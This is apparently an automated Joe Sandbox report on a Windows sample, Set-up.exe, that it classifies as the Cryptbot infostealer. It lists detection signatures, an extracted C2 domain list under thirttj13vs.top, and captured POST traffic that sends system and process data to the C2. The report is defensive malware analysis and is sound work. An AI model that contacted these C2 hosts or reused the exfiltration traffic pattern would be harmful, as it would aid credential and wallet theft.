Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:	Set-up.exe
Analysis ID:	1584505
MD5:	91db00ccdef85a8ae22ee3b8df68eca9
SHA1:	749612cd854e4bc49cef5e951e16f6a6a673fd3f
SHA256:	1d262da9a65b11f2c58e05bb92129dc9b7042366d2cdb5990b158927b3b47ef0
Tags:	CryptBotexeuser-aachum
Infos:

Detection

Cryptbot

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Cryptbot

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contain functionality to detect virtual machines

Infostealer behavior detected

Leaks process information

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

AV process strings found (often used to terminate AV products)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected potential crypto function

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Set-up.exe (PID: 1708 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: 91DB00CCDEF85A8AE22EE3B8DF68ECA9)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Malware Configuration

Threatname: Cryptbot

{"C2 list": ["zgPhome.thirttj13vs.top", "a.dnspod.com3vs.top", "tope.thirttj13vs.top", "home.thirttj13vs.top"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: Set-up.exe PID: 1708	JoeSecurity_Cryptbot_1	Yara detected Cryptbot	Joe Security

Code function: 0_2_001D255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,

0_2_001D255D

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: zgPhome.thirttj13vs.top
Source: Malware configuration extractor	URLs: a.dnspod.com3vs.top
Source: Malware configuration extractor	URLs: tope.thirttj13vs.top
Source: Malware configuration extractor	URLs: home.thirttj13vs.top

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /KQOoGKPKGzBeuSFZKvBJ1736042467 HTTP/1.1Host: home.thirttj13vs.topAccept: /Content-Type: application/jsonContent-Length: 578216Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 39 36 36 34 39 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c
Source: global traffic	HTTP traffic detected: GET /KQOoGKPKGzBeuSFZKvBJ1736042467?argument=0 HTTP/1.1Host: home.thirttj13vs.topAccept: /
Source: global traffic	HTTP traffic detected: POST /KQOoGKPKGzBeuSFZKvBJ1736042467 HTTP/1.1Host: home.thirttj13vs.topAccept: /Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }

Source: Joe Sandbox View

IP Address: 34.147.147.173 34.147.147.173

Source: Joe Sandbox View

ASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_0029A870 recv,

0_2_0029A870

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /KQOoGKPKGzBeuSFZKvBJ1736042467?argument=0 HTTP/1.1Host: home.thirttj13vs.topAccept: /

Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.thirttj13vs.top

Source: unknown

HTTP traffic detected: POST /KQOoGKPKGzBeuSFZKvBJ1736042467 HTTP/1.1Host: home.thirttj13vs.topAccept: */*Content-Type: application/jsonContent-Length: 578216Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 39 36 36 34 39 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Sun, 05 Jan 2025 16:56:19 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Sun, 05 Jan 2025 16:56:21 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Source: Set-up.exe	String found in binary or memory: http://.css
Source: Set-up.exe	String found in binary or memory: http://.jpg
Source: Set-up.exe, Set-up.exe, 00000000.00000002.2343286882.00000000015E2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2341075719.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmp, Set-up.exe, 00000000.00000003.2341194801.00000000015DC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2340945247.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ1736042467
Source: Set-up.exe, 00000000.00000002.2343286882.00000000015E2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2341075719.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2341194801.00000000015DC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2340945247.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ1736042467963
Source: Set-up.exe, 00000000.00000003.2320489291.00000000015FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ1736042467?argument=0
Source: Set-up.exe, 00000000.00000002.2343306605.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2307164518.0000000001600000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2307298080.0000000001600000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2340863254.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2320581422.00000000015F6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2320489291.00000000015FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ1736042467?argument=0ts
Source: Set-up.exe, 00000000.00000002.2343286882.00000000015E2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2341075719.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2341194801.00000000015DC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2340945247.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ1736042467fd4
Source: Set-up.exe, 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ1736042467http://home.thirttj13vs.top/KQOoGKPKGzBeuS
Source: Set-up.exe	String found in binary or memory: http://home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ67
Source: Set-up.exe	String found in binary or memory: http://html4/loose.dtd
Source: Set-up.exe	String found in binary or memory: http://timestamp.digicert.com0
Source: Set-up.exe	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Set-up.exe	String found in binary or memory: https://curl.se/docs/hsts.html
Source: Set-up.exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: Set-up.exe	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: Set-up.exe	String found in binary or memory: https://httpbin.org/ip
Source: Set-up.exe	String found in binary or memory: https://httpbin.org/ipbefore
Source: Set-up.exe, 00000000.00000003.2125383743.0000000001583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/ipocal

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_015E50CB	0_3_015E50CB
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_015E50CB	0_3_015E50CB
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_015E50CB	0_3_015E50CB
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_015E50CB	0_3_015E50CB
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_015E50CB	0_3_015E50CB
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_015E50CB	0_3_015E50CB
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001E05B0	0_2_001E05B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001E6FA0	0_2_001E6FA0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0020F100	0_2_0020F100
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0029B180	0_2_0029B180
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0055E050	0_2_0055E050
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_004DC050	0_2_004DC050
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0055A000	0_2_0055A000
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0027E070	0_2_0027E070
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00520032	0_2_00520032
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003C0080	0_2_003C0080
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003400F0	0_2_003400F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_002A00E0	0_2_002A00E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00460170	0_2_00460170
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00344170	0_2_00344170
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0043E138	0_2_0043E138
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_004EC1A0	0_2_004EC1A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00236210	0_2_00236210
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00360200	0_2_00360200
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005462D0	0_2_005462D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0052E2F0	0_2_0052E2F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_004942F0	0_2_004942F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_002462E0	0_2_002462E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0029C320	0_2_0029C320
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003C0350	0_2_003C0350
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0029E3E0	0_2_0029E3E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0048A3A0	0_2_0048A3A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00332430	0_2_00332430
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_002A0420	0_2_002A0420
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0048E450	0_2_0048E450
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0053C470	0_2_0053C470
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00540460	0_2_00540460
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00524410	0_2_00524410
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_002F24A0	0_2_002F24A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0021E520	0_2_0021E520
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00540560	0_2_00540560
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0043E5D0	0_2_0043E5D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00550590	0_2_00550590
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005385A0	0_2_005385A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001DE620	0_2_001DE620
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0054A610	0_2_0054A610
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0022E6A0	0_2_0022E6A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_004926E0	0_2_004926E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005166B0	0_2_005166B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00358730	0_2_00358730
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0029C770	0_2_0029C770
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00536730	0_2_00536730
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_004187D0	0_2_004187D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003BA780	0_2_003BA780
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00554780	0_2_00554780
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0054A800	0_2_0054A800
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_005248A0	0_2_005248A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0054E940	0_2_0054E940
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00550940	0_2_00550940
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0028C900	0_2_0028C900
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001E4940	0_2_001E4940
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001DA960	0_2_001DA960
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003449F0	0_2_003449F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0053EA70	0_2_0053EA70
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_002C4A00	0_2_002C4A00
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00256AA0	0_2_00256AA0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0048AAC0	0_2_0048AAC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003A6AC0	0_2_003A6AC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003C8AC0	0_2_003C8AC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00400B60	0_2_00400B60
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00490B70	0_2_00490B70
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0052CB00	0_2_0052CB00
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00364B60	0_2_00364B60
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00518B30	0_2_00518B30
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0048AB2C	0_2_0048AB2C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00548BF0	0_2_00548BF0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001DCBB0	0_2_001DCBB0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00536BB0	0_2_00536BB0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003BABC0	0_2_003BABC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00518C70	0_2_00518C70
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0055CC90	0_2_0055CC90
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00516C80	0_2_00516C80
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00544D50	0_2_00544D50
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00554D40	0_2_00554D40
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00518DF0	0_2_00518DF0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0054CD80	0_2_0054CD80
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00282DC0	0_2_00282DC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_004CCE30	0_2_004CCE30
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_004EAE30	0_2_004EAE30
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00336E90	0_2_00336E90
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_002F8F20	0_2_002F8F20
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_001F4F70	0_2_001F4F70
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0029EF90	0_2_0029EF90
